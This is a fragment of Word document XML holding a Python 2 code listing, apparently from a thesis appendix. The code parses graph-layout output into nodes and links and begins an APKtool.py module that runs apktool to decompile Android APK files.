        <w:t xml:space="preserve">                  start = i.index("label=") + 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve"> #               start = i.find("label=") + 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  end = i[start:].index("\"") + start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                # label is the content of the node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  label = i[start : end]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  label = label.replace("\\", "")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                except:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                   label = "123"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                   end = 0</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try:</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start = i[end:].index("P 4 ") + end + 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  end = i[start:].index("\"") + start</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End of modification</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points = i[start:end]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  points.strip()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  points = points.split(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  width = string.atof(points[0]) - string.atof(points[2])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  height = string.atof(points[3]) - string.atof(points[5])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  point_x = string.atof(points[2])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  point_y = self.transform(string.atof(points[3]), pagesize[1])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                # this point is the left-top point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  point = [point_x, point_y]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                except:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  print "Error = %s" % i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  point = [0.0, 0.0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  width = 50.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                  height = 40.0</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node = Node(point[0], point[1], width, height)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                node.setText_call(label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                node.setHint(label)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                nodeList.append(node)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            elif i != '':</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                i = i.replace("\\", "")</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Modified code segment by Valerio Frankovic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Parsing did not work well so I had to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># modify code in order to work well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># Modified units are mostly parameters.</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color = i[i.index("color=")+6:i.index("pos")-1]</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path = i[i.index("pos=\"e,")+7:i.index("\"")]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = path.replace(",", " ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = path.split(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                path = path[2:]</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for j in range(0, len(path)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if j % 2 == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        path[j] = self.transform(string.atof(path[j]), pagesize[1])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        path[j] = string.atof(path[j])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                try :               </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    arrow = i[i.rindex("P 3 ")+4: i.rindex(" \"")]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    arrow = arrow.split(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                except:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    print 123</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End of modification</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for j in range(0, len(arrow)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if j % 2 ==1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        arrow[j] = self.transform(string.atof(arrow[j]), pagesize[1])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        arrow[j] = string.atof(arrow[j])</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link = Link()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                link.setColor(color)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                link.drawLine(path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                link.drawArrow(arrow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                linkList.append(link)</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return [pagesize, nodeList, linkList]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="002033D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc406756518"/>
      <w:bookmarkStart w:id="94" w:name="_Toc406756631"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>APKtool.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import Global</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from startQT import SYSPATH</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Modification</w:t>
      </w:r>
      <w:r w:rsidR="005F74F7" w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve"> made by Valerio Frankovic</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use the apktool to get the smali codes and AndroidManifest.xml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t># return 1: success ; return 0: fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>def callAPKtool(filename):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    outputPath = os.getcwd() + "/temp/ApktoolOutput"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd = "java -jar apktool.jar d -d -f " + "\"" + filename + "\"" + " " + "\"" + outputPath + "\""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
